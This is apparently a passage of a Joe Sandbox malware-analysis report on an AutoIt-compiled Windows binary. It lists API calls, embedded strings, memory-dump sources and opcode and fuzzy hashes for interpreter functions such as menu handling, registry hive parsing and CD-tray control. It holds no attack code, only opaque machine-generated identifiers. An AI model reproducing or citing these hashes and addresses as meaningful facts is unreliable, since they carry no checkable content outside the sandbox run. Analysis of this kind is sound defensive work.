                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: c1d3a3e61125ccfdeaa98624ce5a0ec3898826138488366c098d9f89b0ca9acb
                                                  • Instruction ID: 0e492a309f1449d437c2d037f81bc1290a199242fa7e361a29b0dc70a4096eea
                                                  • Opcode Fuzzy Hash: c1d3a3e61125ccfdeaa98624ce5a0ec3898826138488366c098d9f89b0ca9acb
                                                  • Instruction Fuzzy Hash: 2F915E712047019BDB08EF10C455B6EB7E1BF96750F1588ACF8A65B3A2CB70ED4ADB81
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C4B8B4
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C491C2), ref: 00C4B910
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C4B949
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C4B98C
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C4B9C3
                                                  • FreeLibrary.KERNEL32(?), ref: 00C4B9CF
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4B9DF
                                                  • DestroyIcon.USER32(?,?,?,?,?,00C491C2), ref: 00C4B9EE
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C4BA0B
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C4BA17
                                                    • Part of subcall function 00BE2EFD: __wcsicmp_l.LIBCMT ref: 00BE2F86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: cb6e44cb82dda811796e9a373c9c28cb24bbbb3777bcc1923fa84d9263a7ae09
                                                  • Instruction ID: b9efe735e6118d3f253f6af16957bbc5bb4f3b7bd07ca45f673c97bd2bbb250f
                                                  • Opcode Fuzzy Hash: cb6e44cb82dda811796e9a373c9c28cb24bbbb3777bcc1923fa84d9263a7ae09
                                                  • Instruction Fuzzy Hash: C761A771940219BAEB14DF65CC45BBE7BBCFB18720F108159FA25961C0DB74AE81EBA0
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00C2DCDC
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C2DCEC
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C2DCF8
                                                  • __wsplitpath.LIBCMT ref: 00C2DD56
                                                  • _wcscat.LIBCMT ref: 00C2DD6E
                                                  • _wcscat.LIBCMT ref: 00C2DD80
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C2DD95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DDA9
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DDDB
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DDFC
                                                  • _wcscpy.LIBCMT ref: 00C2DE08
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C2DE47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: cf9a118d1b8073212233b9d7f4a7a7d5f3c3d261aeceba867cd931d1c55d5bba
                                                  • Instruction ID: 48bf42c634a25d485836b25c29cb1c81c9fcb7208aed65aa31c6fc08ac56f67c
                                                  • Opcode Fuzzy Hash: cf9a118d1b8073212233b9d7f4a7a7d5f3c3d261aeceba867cd931d1c55d5bba
                                                  • Instruction Fuzzy Hash: DB6189765042159FCB10EF20D844EAEB3E8FF99310F04896EF99AC7251DB71EA45CB92
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00C29C7F
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C29CA0
                                                  • __swprintf.LIBCMT ref: 00C29CF9
                                                  • __swprintf.LIBCMT ref: 00C29D12
                                                  • _wprintf.LIBCMT ref: 00C29DB9
                                                  • _wprintf.LIBCMT ref: 00C29DD7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-3080491070
                                                  • Opcode ID: 07b0c5e6c28e7eb0e20d333d2454ea594e4ebff4af5fe59840e9c81eb03fb2f4
                                                  • Instruction ID: 46841ca230e42a17be33a195765ea3a8a482466a92c14eabc6e8164fd844d70c
                                                  • Opcode Fuzzy Hash: 07b0c5e6c28e7eb0e20d333d2454ea594e4ebff4af5fe59840e9c81eb03fb2f4
                                                  • Instruction Fuzzy Hash: DA516F71940619AACF14EBE0DD46FEEB7B8EF14300F5040A9B509721A1DF712F99DB61
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C2A3CB
                                                  • GetDriveTypeW.KERNEL32 ref: 00C2A418
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A460
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A497
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A4C5
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 60d7d4bb5fde07c5543d13df4b0fe308a7182c01a5ae678c0034a75a9e30d5e7
                                                  • Instruction ID: 16d2bc3704f890266a28ea223e9e455fa4845c43231c606f420ac149f9d237d7
                                                  • Opcode Fuzzy Hash: 60d7d4bb5fde07c5543d13df4b0fe308a7182c01a5ae678c0034a75a9e30d5e7
                                                  • Instruction Fuzzy Hash: 9D514B711043059FC700EF14C895E6AB7E4FF98758F1088ADF89A972A1DB71EE0ACB52
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00BFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C1F8DF
                                                  • LoadStringW.USER32(00000000,?,00BFE029,00000001), ref: 00C1F8E8
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • GetModuleHandleW.KERNEL32(00000000,00C85310,?,00000FFF,?,?,00BFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C1F90A
                                                  • LoadStringW.USER32(00000000,?,00BFE029,00000001), ref: 00C1F90D
                                                  • __swprintf.LIBCMT ref: 00C1F95D
                                                  • __swprintf.LIBCMT ref: 00C1F96E
                                                  • _wprintf.LIBCMT ref: 00C1FA17
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C1FA2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 984253442-2268648507
                                                  • Opcode ID: f9e071a9ef630e9c91f3740e9695bbed83136e48595061cd254fb393593a9ddf
                                                  • Instruction ID: f4b139c51bf83627c9d74db593a27fba2d2ade16ad86b68486c95a6d0896f0be
                                                  • Opcode Fuzzy Hash: f9e071a9ef630e9c91f3740e9695bbed83136e48595061cd254fb393593a9ddf
                                                  • Instruction Fuzzy Hash: 10415072944109AACF14FBE0DD56EEEB7B8EF19310F1000A9B505720A2EE756F4ADF60
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C49207,?,?), ref: 00C4BA56
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA6D
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA78
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA85
                                                  • GlobalLock.KERNEL32(00000000), ref: 00C4BA8E
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA9D
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00C4BAA6
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BAAD
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BABE
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C52CAC,?), ref: 00C4BAD7
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C4BAE7
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00C4BB0B
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C4BB36
                                                  • DeleteObject.GDI32(00000000), ref: 00C4BB5E
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C4BB74
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: 066389ca4e42323207d0c01e300d3c831dc01679bb4c1dc99e7197a1bca5bbb9
                                                  • Instruction ID: 95facf8493862227df4e85105bbc4aa2e8c07f0fa969beeac6855f767eeb758e
                                                  • Opcode Fuzzy Hash: 066389ca4e42323207d0c01e300d3c831dc01679bb4c1dc99e7197a1bca5bbb9
                                                  • Instruction Fuzzy Hash: 64410679600209AFDB219F65DC88FAFBBB8FB8A711F104068F915D7260D7709E42DB60
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00C2DA10
                                                  • _wcscat.LIBCMT ref: 00C2DA28
                                                  • _wcscat.LIBCMT ref: 00C2DA3A
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C2DA4F
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DA63
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C2DA7B
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C2DA95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DAA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 2fc80f1fb191b3ef670c9d3c2e8fc27c34047c2a387b7cce8798fe9845a78f6d
                                                  • Instruction ID: dcae33b0444ae172739c726c6f83338ab0294b3efe4f74183bde24c771704fb6
                                                  • Opcode Fuzzy Hash: 2fc80f1fb191b3ef670c9d3c2e8fc27c34047c2a387b7cce8798fe9845a78f6d
                                                  • Instruction Fuzzy Hash: BB81C3715043509FCB24EF65D844AAEB7E8BF99310F14886EF89AC7650EB30DE85CB52
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C4C1FC
                                                  • GetFocus.USER32 ref: 00C4C20C
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00C4C217
                                                  • _memset.LIBCMT ref: 00C4C342
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C4C36D
                                                  • GetMenuItemCount.USER32(?), ref: 00C4C38D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C4C3A0
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C4C3D4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C4C41C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C4C454
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C4C489
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: 8a6ff845202186f6eccf05e4c85f4fd732e9d1e35edda453a6bca31e3718cfa0
                                                  • Instruction ID: 6d8d41469750b809039484421b3d02116d02dba3cf19c6d63c5b174c427d41ba
                                                  • Opcode Fuzzy Hash: 8a6ff845202186f6eccf05e4c85f4fd732e9d1e35edda453a6bca31e3718cfa0
                                                  • Instruction Fuzzy Hash: 2E817C74609301AFD760DF14C9D4ABBBBE8FB88714F00492EF9A5972A1D770D905CB62
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C3738F
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C3739B
                                                  • CreateCompatibleDC.GDI32(?), ref: 00C373A7
                                                  • SelectObject.GDI32(00000000,?), ref: 00C373B4
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C37408
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C37444
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C37468
                                                  • SelectObject.GDI32(00000006,?), ref: 00C37470
                                                  • DeleteObject.GDI32(?), ref: 00C37479
                                                  • DeleteDC.GDI32(00000006), ref: 00C37480
                                                  • ReleaseDC.USER32(00000000,?), ref: 00C3748B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 0921be61717521fce787b20113ee8254348dbcb10ff4ffd2495d118acc71acb0
                                                  • Instruction ID: 909885393994b0819a08e9a830b5922dfb8cef4d5119852d7ffa462ad55f3e33
                                                  • Opcode Fuzzy Hash: 0921be61717521fce787b20113ee8254348dbcb10ff4ffd2495d118acc71acb0
                                                  • Instruction Fuzzy Hash: 575138B5904209EFCB24CFA9CC85FAEBBB9FF49310F14852DF95997220C771A9418B60
                                                  APIs
                                                    • Part of subcall function 00BE0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BC6B0C,?,00008000), ref: 00BE0973
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC6BAD
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BC6CFA
                                                    • Part of subcall function 00BC586D: _wcscpy.LIBCMT ref: 00BC58A5
                                                    • Part of subcall function 00BE363D: _iswctype.LIBCMT ref: 00BE3645
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: dbfdd8d33bb9bac85f4d6913032456c870801d72c8aad661824cbda06e863e07
                                                  • Instruction ID: 3c7ee553a2f76dc48a3713f3b288310d10360f7aab2d2a6aa816381d1502da1f
                                                  • Opcode Fuzzy Hash: dbfdd8d33bb9bac85f4d6913032456c870801d72c8aad661824cbda06e863e07
                                                  • Instruction Fuzzy Hash: F802BE301083459FC724EF24C881EAFBBE5EF99314F0049ADF596972A1DB70E989CB52
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22D50
                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C22DDD
                                                  • GetMenuItemCount.USER32(00C85890), ref: 00C22E66
                                                  • DeleteMenu.USER32(00C85890,00000005,00000000,000000F5,?,?), ref: 00C22EF6
                                                  • DeleteMenu.USER32(00C85890,00000004,00000000), ref: 00C22EFE
                                                  • DeleteMenu.USER32(00C85890,00000006,00000000), ref: 00C22F06
                                                  • DeleteMenu.USER32(00C85890,00000003,00000000), ref: 00C22F0E
                                                  • GetMenuItemCount.USER32(00C85890), ref: 00C22F16
                                                  • SetMenuItemInfoW.USER32(00C85890,00000004,00000000,00000030), ref: 00C22F4C
                                                  • GetCursorPos.USER32(?), ref: 00C22F56
                                                  • SetForegroundWindow.USER32(00000000), ref: 00C22F5F
                                                  • TrackPopupMenuEx.USER32(00C85890,00000000,?,00000000,00000000,00000000), ref: 00C22F72
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C22F7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 3993528054-0
                                                  • Opcode ID: f5e4ecfa1ccb0679856aca452a1cfc33dbd1e556ede1a87f2a0d7d50dcf73cc1
                                                  • Instruction ID: bef90201f9507fe7db66243bd0fbe1f9468851e4d847155d10105da51fe2439a
                                                  • Opcode Fuzzy Hash: f5e4ecfa1ccb0679856aca452a1cfc33dbd1e556ede1a87f2a0d7d50dcf73cc1
                                                  • Instruction Fuzzy Hash: 1F71F770600225BFEB218F55EC45FAEBF64FF05724F10421AF625A65E1CBB15D20EB91
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: b2f292063ec535b447d1715dbeb2dec84f9ee2e4c1d9fb0bcdec25028835186b
                                                  • Instruction ID: bfce0169f727fac470b3b3a39e6f1b8d7da84576842bab6a6400ba3229bb716b
                                                  • Opcode Fuzzy Hash: b2f292063ec535b447d1715dbeb2dec84f9ee2e4c1d9fb0bcdec25028835186b
                                                  • Instruction Fuzzy Hash: 89417C7219024A8BDF10EF51D855AEE37A0FF21310F2444A8FD651B292DB70DE9BCBA0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BFE2A0,00000010,?,Bad directive syntax error,00C4F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C1F7C2
                                                  • LoadStringW.USER32(00000000,?,00BFE2A0,00000010), ref: 00C1F7C9
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • _wprintf.LIBCMT ref: 00C1F7FC
                                                  • __swprintf.LIBCMT ref: 00C1F81E
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C1F88D
                                                  Strings
                                                  Memory Dump Source
